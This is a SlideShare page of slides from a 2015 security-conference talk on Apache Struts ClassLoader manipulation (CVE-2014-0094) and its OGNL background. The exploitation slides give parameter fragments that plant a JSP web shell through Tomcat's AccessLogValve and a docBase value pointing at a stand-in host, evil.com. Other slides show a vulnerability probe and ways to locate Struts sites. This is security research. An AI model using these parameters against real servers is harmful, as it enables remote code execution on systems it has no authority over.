SlideShare une entreprise Scribd logo

Deep Dive into the Java Framework Apache Struts

T
testpurposes

Slides for the talk given at RootedCON 2015 security conference by Julián Vilas (security analyst and researcher). The goal of the talk was giving a view on the security of the Apache Struts framework.

Technologie
1  sur  43
Télécharger pour lire hors ligne
Deep  inside  the  Java   framework     Apache  Struts       Julián  Vilas  
Whoami   •  Julián  Vilas  (Redsadic)   – @julianvilas   •  Security  Analyst  &  Researcher    
¿Apache  Struts?   Java  framework   – for  Java  webapps   – Two  major  versions   • Struts  1.x  (EoL  since  2013)   • Struts  2.x  
Why  Struts?   •  (Mar  2014)  CVE-­‐2014-­‐0094  goes  public   •  What  the  hell  was  it?   – Struts  2  vulnerability   – UnauthenVcated   – All  versions  affected   – Could  lead  to  RCE  
CVE-­‐2014-­‐0094   “ParametersInterceptor  allows  access  to  'class'   parameter  which  is  directly  mapped  to  getClass()   method  and  allows  ClassLoader  manipulaVon”     •  Credits:   –  Peter  Magnusson   –  Przemysław  Celej   •  A^er  reading  it…   –  Let’s  go  learning  some  basics  
OGNL   Object  Graph  NavigaVon  Language     •  Expression  Language  for  gedng  and  sedng   properVes  of  Java  objects   – Objects  that  are  stored  in  the  Context    
top   OGNL   #foo.dummy     //  foo.getDummy()     #bar.dummy   //  bar.getDummy()     dummy   //  qux.getDummy()     dummy  =  “RootedCON”   //  qux.setDummy(“RootedCON”)   foo   bar   baz   qux   Context   root   foo   bar   qux   ….   Struts2  OGNL  Context   (AcDonContext)   ValueStack  
Struts  2  request  processing       1 7 Filter     Dispatcher   Interceptors   AcVon   Result   /example/hello.acDon   HTML   1 7 User   2 3 4 56 hMp://struts.example.com/example/hello.acDon   HTML   ParametersInterceptor   Struts2  app  
ParametersInterceptor   “This  interceptor  gets  all  parameters  from   AcVonContext.getParameters()  and  sets  them  on   the  value  stack  by  calling   ValueStack.setValue(String,  Object)”   “Because  parameter  names  are  effecDvely  OGNL   statements,  it  is  important  that  security  be  taken   into  account”   hpp://struts.apache.org/release/2.0.x/struts2-­‐core/apidocs/com/opensymphony/xwork2/interceptor/ ParametersInterceptor.html    
ParametersInterceptor  example   …   HelloWorldAcVon   …   AcDonContext   ValueStack   PUSH   LOOKUP   SETTER   SET  
ParametersInterceptor  example  
Available  methods   Methods  that  can  be  reached   – As  seen,  OGNL  allows  us  to  reference  gepers  and   sepers     execute()   getUsername()   setUsername()   HelloWorldAcDon   ?   AcDonSupport   EXTENDS  
AcVonSupport  methods  
Available  methods   Methods  that  can  be  reached   – As  seen,  OGNL  allows  us  to  reference  gepers  and   sepers     execute()   getUsername()   setUsername()   HelloWorldAcDon   …   getErrors()   getTexts()   getFieldErrors()   getAcDonErrors()   getAcDonMessages()   getErrorMessages()   …   AcDonSupport   EXTENDS  
AcVonSupport  
Available  methods   Methods  that  can  be  reached   – As  seen,  OGNL  allows  us  to  reference  gepers  and   sepers     execute()   getUsername()   setUsername()   HelloWorldAcDon   …   getErrors()   getTexts()   getFieldErrors()   getAcDonErrors()   getAcDonMessages()   getErrorMessages()   …   AcDonSupport   EXTENDS   …   getClass()   …   Object   EXTENDS  
NavigaVng  objects             •  Parameters  are  evaluated  iteraVvely  as  an  AST   chain,  composed  by   – A  chain  of  gepers  (without  parameters)   – Ending  with  a  seper  (1  String,  boolean  or  int   parameter)    
Looking  for  sepers   •  Through  object  navigaVon  reach  several  seper   methods  not  part  of  the  AcVon  can  be  reached   –  What  methods?   •  Post  published  by  neobyte       hpp://sec.baidu.com/index.php?research/detail/id/18     1.  PoC  for  gedng  reachable  sepers   2.  A  method  for  gedng  RCE  on  Tomcat  8    
DEMO   Struts  Tester  on   Tomcat  6  /  7  &  Tomcat  8     customized  &  commented  version  ready  to  use   hpps://github.com/julianvilas/rooted2k15  
Exploitability   Tested  against:     •  Tomcat  6  /  7  à  RCE  via  “docBase”  (win  only)   •  Tomcat  8  à  RCE  via  “AccessLogValve”   •  Glassfish  4  à  RCE  via  “docBase”  (win  only)   •  Websphere  8.5  (developer)  à  RCE  not  found   •  Weblogic  10  &  12  à  RCE  not  found   •  JBOSS  7.1  &  7.4  à  RCE  not  found  
What  about  Struts  1   •  According  to  CVE-­‐2014-­‐0114,  Struts  1  is  also  vulnerable   •  Unpatched!  (struts  1  is  over  EoL,  but  is  sVll  in  use)     •  Different  reason:  Struts  1  no  OGNL  nor  Value  Stack   –  The  key:  bean  populaVon  with  BeanUVls       •  You  can  find  some  Alvaro  Muñoz  (@pwntester)  gold,  like   further  explanaVon  and  a  filter  to  be  applied  as  a   workaround,  at   –  hpp://h30499.www3.hp.com/t5/HP-­‐Security-­‐Research-­‐Blog/Protect-­‐your-­‐ Struts1-­‐applicaVons/ba-­‐p/6463188#.VBMB0i5_s0z   –  hpp://h30499.www3.hp.com/t5/HP-­‐Security-­‐Research-­‐Blog/Update-­‐your-­‐ Struts-­‐1-­‐ClassLoader-­‐manipulaVon-­‐filters/ba-­‐p/6639204#.VOsFG7CG_8Q  
AccessLogValve  exploitaVon             A  log  file  with  name  shell1.jsp  is  created  at  webapps/ROOT.   When  requesVng  a  inexistent  URL,  it’s  logged  into  the  log  file   (that  it’s  going  to  be  interpreted  as  a  JSP  when  get  accessed).   .directory=webapps/ROOT     .prefix=shell   .suffix=.jsp   .fileDateFormat=1   1 2 3 4
DEMO     AccessLogValve  exploitaVon     hpps://github.com/rapid7/metasploit-­‐framework/blob/master/modules/exploits/ mulV/hpp/struts_code_exec_classloader.rb  
docBase  exploitaVon   •  “The  Document  Base  (also  known  as  the  Context   Root)  directory  for  this  web  applicaVon,  or  the   pathname  to  the  web  applicaDon  archive  file  (if  this   web  applicaVon  is  being  executed  directly  from  the   WAR  file).”   •  Legit  applicaVon  goes  down   .docBase=//evil.com/shared    
About  metasploit  module   •  Tomcat  6/7  &  GlassFish  (docBase)     – Only  Win     – Not  landed  yet  in  trunk  but  works  fine   – Maphew  Hall  (0x41414141)  pull  requests:   hpps://github.com/rapid7/metasploit-­‐framework/pull/3074   hpps://github.com/rapid7/metasploit-­‐framework/pull/3075   hpps://github.com/rapid7/metasploit-­‐framework/pull/3323     – Same  module  than  before,  landed  yesterday  night  
DEMO   docBase  exploitaVon    
I  know  Kung-­‐fu                     •  Now  what?  
Searching  Struts  sites   •  Dumb  detecVon  of  Struts  2  sites   – Default  extension  for  Struts  2:  “.acVon”   •  Also,  when  default  configured,  it  accepts  both  “.acVon”   and  no  extension      
Searching  Struts  sites  
Searching  Struts  sites  
Searching  Struts  sites   •  Dumb  detecVon  of  Struts  1  sites     – Default  extension  for  Struts  1:  “.do”    
Searching  Struts  sites   hpps://web.archive.org/web/20060519001958/hpp://simonpeter.com/technology/ java/struts/sites.html  
Vulnerability  checking   •  To  check  if  a  Struts  2  site  is  vulnerable,  modify   “cacheMaxSize”  property   –  Integer.MAX_VALUE  ==  2147483647  (in  x86)             •  Tomcat  6/7  &  Glassfish   •  Tomcat  8       2147483647   2147483648   AAAAAAAAA  
Vulnerability  checking   •  In  Struts  1  if  the  conversion  String  to  Integer   fails  a  default  value  0  is  set   •  But  when  trying  to  set  a  method  that  receives   an  Object  with  a  String,  a  excepVon  is  raised       ROOTEDCON  
OK  I  see,  but…        
Previous  security  bulleVns         RCE,  when  form  validaDon  fails  field  values   are  interpreted  as  OGNL     RCE,  bypass  the  '#'-­‐usage  protecDon  built   into  the  ParametersInterceptor  to  execute   OGNL   RCE,  bypass  the  '#'-­‐usage  protecDon  built   into  the  ParametersInterceptor  to  execute   OGNL  !  S2-­‐003  fix  was  incomplete   RCE,  user’s  input  is  evaluated  as  OGNL  when   there’s  a  conversion  error   Several  RCE:  via  ExcepDonDelegator  (same   as  S2-­‐007),  CookieInterceptor  (same  idea   than  S2-­‐003  and  S2-­‐005),  etc.   RCE,  incomplete  fix  for  S2-­‐003  and  S2-­‐005  on   ParametersInterceptor    
Previous  security  bulleVns         RCE,  incomplete  fix  for  S2-­‐003,  S2-­‐005  and   S2-­‐009  on  ParametersInterceptor  when   using  values  for  redirecDons   RCE,  s:url  and  s:a  tags,  when   "includeParams"  is  set,  allow  evaluaDng  the   values  of  request  parameters  as  OGNL.   RCE,  same  than  S2-­‐013,  incomplete  fix.   RCE,  acDons  using  wildcards  and  Double   OGNL  evaluaDon  allow  OGNL  injecDon   RCE:  DefaultAcDonMapper  short-­‐circuit   navigaDon  interpreted  as  OGNL   RCE,  what  we  saw  in  this  presentaDon  ☺   (ParametersInterceptor)     RCE,  Incomplete  fix  for  S2-­‐020   Incomplete  fix  for  S2-­‐020  and  S2-­‐021  
Previous  security  bulleVns        
Conclusions?   •  Seven  years  from  between  S2-­‐001  and  S2-­‐020   •  Same  kind  of  vulnerabiliVes:  injecDng  OGNL   from  user-­‐supplied  data     •  Several  bypasses  for  fixes   •  Almost  all  RCE       •  Take  your  own…  
Bonus  track  -­‐  Confluence   •  Is  based  on  a  WebWork  fork  (previous  than  Struts  2)   •  If  you  look  their  bulleVns   –  Versions  up  to  and  including  5.5.1  vulnerable  to   ClassLoader  manipulaDon   hpps://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory +2014-­‐05-­‐21     –  Versions  up  to  5.6  (before  5.6.6  and  5.5.7)  are  vulnerable   to  double  OGNL  evaluaDon   hpps://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+-­‐ +2015-­‐01-­‐21   •  Don’t  they  look  familiar?  J  
Bonus  track  -­‐  Confluence  
QuesVons?   •  You  can  ask  also  :   – Poke  me  around   – by  twiper:  @julianvilas        
QuesVons?   •  And  what  do  you  think  about  OGNL?     Thanks  for  aMending!!!  ☺  

Recommandé

Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
Elastic 101 - Get started
Elastic 101 - Get startedElastic 101 - Get started
Elastic 101 - Get startedIsmaeel Enjreny
 
Introduction to Maven
Introduction to MavenIntroduction to Maven
Introduction to MavenMindfire Solutions
 
Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...
Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...
Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...Codemotion
 
Bytecode Manipulation with a Java Agent and Byte Buddy
Bytecode Manipulation with a Java Agent and Byte BuddyBytecode Manipulation with a Java Agent and Byte Buddy
Bytecode Manipulation with a Java Agent and Byte BuddyKoichi Sakata
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking themMikhail Egorov
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in PythonPublic Broadcasting Service
 
Fixing the Java Serialization Mess
Fixing the Java Serialization Mess Fixing the Java Serialization Mess
Fixing the Java Serialization Mess Salesforce Engineering
 

Recommandé

Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
Elastic 101 - Get started
Elastic 101 - Get startedElastic 101 - Get started
Elastic 101 - Get startedIsmaeel Enjreny
 
Introduction to Maven
Introduction to MavenIntroduction to Maven
Introduction to MavenMindfire Solutions
 
Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...
Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...
Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...Codemotion
 
Bytecode Manipulation with a Java Agent and Byte Buddy
Bytecode Manipulation with a Java Agent and Byte BuddyBytecode Manipulation with a Java Agent and Byte Buddy
Bytecode Manipulation with a Java Agent and Byte BuddyKoichi Sakata
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking themMikhail Egorov
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in PythonPublic Broadcasting Service
 
Fixing the Java Serialization Mess
Fixing the Java Serialization Mess Fixing the Java Serialization Mess
Fixing the Java Serialization Mess Salesforce Engineering
 
Java Spring framework, Dependency Injection, DI, IoC, Inversion of Control
Java Spring framework, Dependency Injection, DI, IoC, Inversion of ControlJava Spring framework, Dependency Injection, DI, IoC, Inversion of Control
Java Spring framework, Dependency Injection, DI, IoC, Inversion of ControlArjun Thakur
 
Jenkins pipeline
Jenkins pipelineJenkins pipeline
Jenkins pipelinePatxi Gortázar
 
Making Java more dynamic: runtime code generation for the JVM
Making Java more dynamic: runtime code generation for the JVMMaking Java more dynamic: runtime code generation for the JVM
Making Java more dynamic: runtime code generation for the JVMRafael Winterhalter
 
Scaling up task processing with Celery
Scaling up task processing with CeleryScaling up task processing with Celery
Scaling up task processing with CeleryNicolas Grasset
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)
Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)
Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)CODE WHITE GmbH
 
[OPD 2019] Attacking JWT tokens
[OPD 2019] Attacking JWT tokens[OPD 2019] Attacking JWT tokens
[OPD 2019] Attacking JWT tokensOWASP
 
TypeScript Overview
TypeScript OverviewTypeScript Overview
TypeScript OverviewAniruddha Chakrabarti
 
Distributed tracing 101
Distributed tracing 101Distributed tracing 101
Distributed tracing 101Itiel Shwartz
 
Spring Boot
Spring BootSpring Boot
Spring BootJiayun Zhou
 
RxJS 6 新手入門
RxJS 6 新手入門RxJS 6 新手入門
RxJS 6 新手入門Will Huang
 
Spring 3.1 and MVC Testing Support
Spring 3.1 and MVC Testing SupportSpring 3.1 and MVC Testing Support
Spring 3.1 and MVC Testing SupportSam Brannen
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4hackers.com
 
ORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMMikhail Egorov
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)Bernardo Damele A. G.
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionSoroush Dalili
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Arquitetura básica de testes para seu projeto Java
Arquitetura básica de testes para seu projeto JavaArquitetura básica de testes para seu projeto Java
Arquitetura básica de testes para seu projeto JavaElias Nogueira
 
Advanced Node.JS Meetup
Advanced Node.JS MeetupAdvanced Node.JS Meetup
Advanced Node.JS MeetupLINAGORA
 
Google mock for dummies
Google mock for dummiesGoogle mock for dummies
Google mock for dummiesHarry Potter
 
Charla Rooted2k15
Charla Rooted2k15Charla Rooted2k15
Charla Rooted2k15skuater
 
Securing Your .NET Application
Securing Your .NET ApplicationSecuring Your .NET Application
Securing Your .NET ApplicationIron Speed
 

Contenu connexe

Tendances

Java Spring framework, Dependency Injection, DI, IoC, Inversion of Control
Java Spring framework, Dependency Injection, DI, IoC, Inversion of ControlJava Spring framework, Dependency Injection, DI, IoC, Inversion of Control
Java Spring framework, Dependency Injection, DI, IoC, Inversion of ControlArjun Thakur
 
Making Java more dynamic: runtime code generation for the JVM
Making Java more dynamic: runtime code generation for the JVMMaking Java more dynamic: runtime code generation for the JVM
Making Java more dynamic: runtime code generation for the JVMRafael Winterhalter
 
Scaling up task processing with Celery
Scaling up task processing with CeleryScaling up task processing with Celery
Scaling up task processing with CeleryNicolas Grasset
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)
Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)
Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)CODE WHITE GmbH
 
[OPD 2019] Attacking JWT tokens
[OPD 2019] Attacking JWT tokens[OPD 2019] Attacking JWT tokens
[OPD 2019] Attacking JWT tokensOWASP
 
Distributed tracing 101
Distributed tracing 101Distributed tracing 101
Distributed tracing 101Itiel Shwartz
 
RxJS 6 新手入門
RxJS 6 新手入門RxJS 6 新手入門
RxJS 6 新手入門Will Huang
 
Spring 3.1 and MVC Testing Support
Spring 3.1 and MVC Testing SupportSpring 3.1 and MVC Testing Support
Spring 3.1 and MVC Testing SupportSam Brannen
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4hackers.com
 
ORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMMikhail Egorov
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)Bernardo Damele A. G.
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionSoroush Dalili
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Arquitetura básica de testes para seu projeto Java
Arquitetura básica de testes para seu projeto JavaArquitetura básica de testes para seu projeto Java
Arquitetura básica de testes para seu projeto JavaElias Nogueira
 
Advanced Node.JS Meetup
Advanced Node.JS MeetupAdvanced Node.JS Meetup
Advanced Node.JS MeetupLINAGORA
 
Google mock for dummies
Google mock for dummiesGoogle mock for dummies
Google mock for dummiesHarry Potter
 

Tendances (20)

Java Spring framework, Dependency Injection, DI, IoC, Inversion of Control
Java Spring framework, Dependency Injection, DI, IoC, Inversion of ControlJava Spring framework, Dependency Injection, DI, IoC, Inversion of Control
Java Spring framework, Dependency Injection, DI, IoC, Inversion of Control
 
Jenkins pipeline
Jenkins pipelineJenkins pipeline
Jenkins pipeline
 
Making Java more dynamic: runtime code generation for the JVM
Making Java more dynamic: runtime code generation for the JVMMaking Java more dynamic: runtime code generation for the JVM
Making Java more dynamic: runtime code generation for the JVM
 
Scaling up task processing with Celery
Scaling up task processing with CeleryScaling up task processing with Celery
Scaling up task processing with Celery
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)
Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)
Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)
 
[OPD 2019] Attacking JWT tokens
[OPD 2019] Attacking JWT tokens[OPD 2019] Attacking JWT tokens
[OPD 2019] Attacking JWT tokens
 
TypeScript Overview
TypeScript OverviewTypeScript Overview
TypeScript Overview
 
Distributed tracing 101
Distributed tracing 101Distributed tracing 101
Distributed tracing 101
 
Spring Boot
Spring BootSpring Boot
Spring Boot
 
RxJS 6 新手入門
RxJS 6 新手入門RxJS 6 新手入門
RxJS 6 新手入門
 
Spring 3.1 and MVC Testing Support
Spring 3.1 and MVC Testing SupportSpring 3.1 and MVC Testing Support
Spring 3.1 and MVC Testing Support
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
 
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
 
ORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORM
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
Arquitetura básica de testes para seu projeto Java
Arquitetura básica de testes para seu projeto JavaArquitetura básica de testes para seu projeto Java
Arquitetura básica de testes para seu projeto Java
 
Advanced Node.JS Meetup
Advanced Node.JS MeetupAdvanced Node.JS Meetup
Advanced Node.JS Meetup
 
Google mock for dummies
Google mock for dummiesGoogle mock for dummies
Google mock for dummies
 

En vedette

Charla Rooted2k15
Charla Rooted2k15Charla Rooted2k15
Charla Rooted2k15skuater
 
Securing Your .NET Application
Securing Your .NET ApplicationSecuring Your .NET Application
Securing Your .NET ApplicationIron Speed
 
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"Pawel Krawczyk
 
Real Life Information Security
Real Life Information SecurityReal Life Information Security
Real Life Information SecurityPawel Krawczyk
 
Maximizing your coaxial (cable tv) v2
Maximizing your coaxial (cable tv) v2Maximizing your coaxial (cable tv) v2
Maximizing your coaxial (cable tv) v2Broto Santoso
 
Cyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightCyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightHostway|HOSTING
 
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue TeamersGo Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamersjasonjfrank
 
Queue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor Networks
Queue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor NetworksQueue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor Networks
Queue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor NetworksCSCJournals
 
.Net Hijacking to Defend PowerShell BSidesSF2017
.Net Hijacking to Defend PowerShell BSidesSF2017 .Net Hijacking to Defend PowerShell BSidesSF2017
.Net Hijacking to Defend PowerShell BSidesSF2017 Amanda Rousseau
 
SETTING METHOD IN CONSIDERATION OF THE PCI/DSS
SETTING METHOD IN CONSIDERATION OF THE PCI/DSSSETTING METHOD IN CONSIDERATION OF THE PCI/DSS
SETTING METHOD IN CONSIDERATION OF THE PCI/DSShogehuga
 
Top 10 agile project interview questions and answers
Top 10 agile project interview questions and answersTop 10 agile project interview questions and answers
Top 10 agile project interview questions and answersWhitneyHouston012
 
Passive infrastructure of FTTH networks: an overview
Passive infrastructure of FTTH networks: an overviewPassive infrastructure of FTTH networks: an overview
Passive infrastructure of FTTH networks: an overviewLuc De Heyn
 
A very quick introduction to HFC, DOCSIS 3.0 and 3.1
A very quick introduction to HFC, DOCSIS 3.0 and 3.1A very quick introduction to HFC, DOCSIS 3.0 and 3.1
A very quick introduction to HFC, DOCSIS 3.0 and 3.1Erik Vloothuis
 
ColdFusion for Penetration Testers
ColdFusion for Penetration TestersColdFusion for Penetration Testers
ColdFusion for Penetration TestersChris Gates
 
Waf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScriptWaf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScriptDenis Kolegov
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsChris Gates
 

En vedette (16)

Charla Rooted2k15
Charla Rooted2k15Charla Rooted2k15
Charla Rooted2k15
 
Securing Your .NET Application
Securing Your .NET ApplicationSecuring Your .NET Application
Securing Your .NET Application
 
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
 
Real Life Information Security
Real Life Information SecurityReal Life Information Security
Real Life Information Security
 
Maximizing your coaxial (cable tv) v2
Maximizing your coaxial (cable tv) v2Maximizing your coaxial (cable tv) v2
Maximizing your coaxial (cable tv) v2
 
Cyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightCyber Threat Hunting with Phirelight
Cyber Threat Hunting with Phirelight
 
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue TeamersGo Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
 
Queue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor Networks
Queue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor NetworksQueue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor Networks
Queue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor Networks
 
.Net Hijacking to Defend PowerShell BSidesSF2017
.Net Hijacking to Defend PowerShell BSidesSF2017 .Net Hijacking to Defend PowerShell BSidesSF2017
.Net Hijacking to Defend PowerShell BSidesSF2017
 
SETTING METHOD IN CONSIDERATION OF THE PCI/DSS
SETTING METHOD IN CONSIDERATION OF THE PCI/DSSSETTING METHOD IN CONSIDERATION OF THE PCI/DSS
SETTING METHOD IN CONSIDERATION OF THE PCI/DSS
 
Top 10 agile project interview questions and answers
Top 10 agile project interview questions and answersTop 10 agile project interview questions and answers
Top 10 agile project interview questions and answers
 
Passive infrastructure of FTTH networks: an overview
Passive infrastructure of FTTH networks: an overviewPassive infrastructure of FTTH networks: an overview
Passive infrastructure of FTTH networks: an overview
 
A very quick introduction to HFC, DOCSIS 3.0 and 3.1
A very quick introduction to HFC, DOCSIS 3.0 and 3.1A very quick introduction to HFC, DOCSIS 3.0 and 3.1
A very quick introduction to HFC, DOCSIS 3.0 and 3.1
 
ColdFusion for Penetration Testers
ColdFusion for Penetration TestersColdFusion for Penetration Testers
ColdFusion for Penetration Testers
 
Waf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScriptWaf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScript
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
 

Similaire à Deep Dive into the Java Framework Apache Struts

#ATAGTR2021 Presentation - "Selenium 4 Observability – a 90 Min Hands on Lab"
#ATAGTR2021 Presentation - "Selenium 4 Observability – a 90 Min Hands on Lab"#ATAGTR2021 Presentation - "Selenium 4 Observability – a 90 Min Hands on Lab"
#ATAGTR2021 Presentation - "Selenium 4 Observability – a 90 Min Hands on Lab"Agile Testing Alliance
 
ApacheCon Europe 2012 -Big Search 4 Big Data
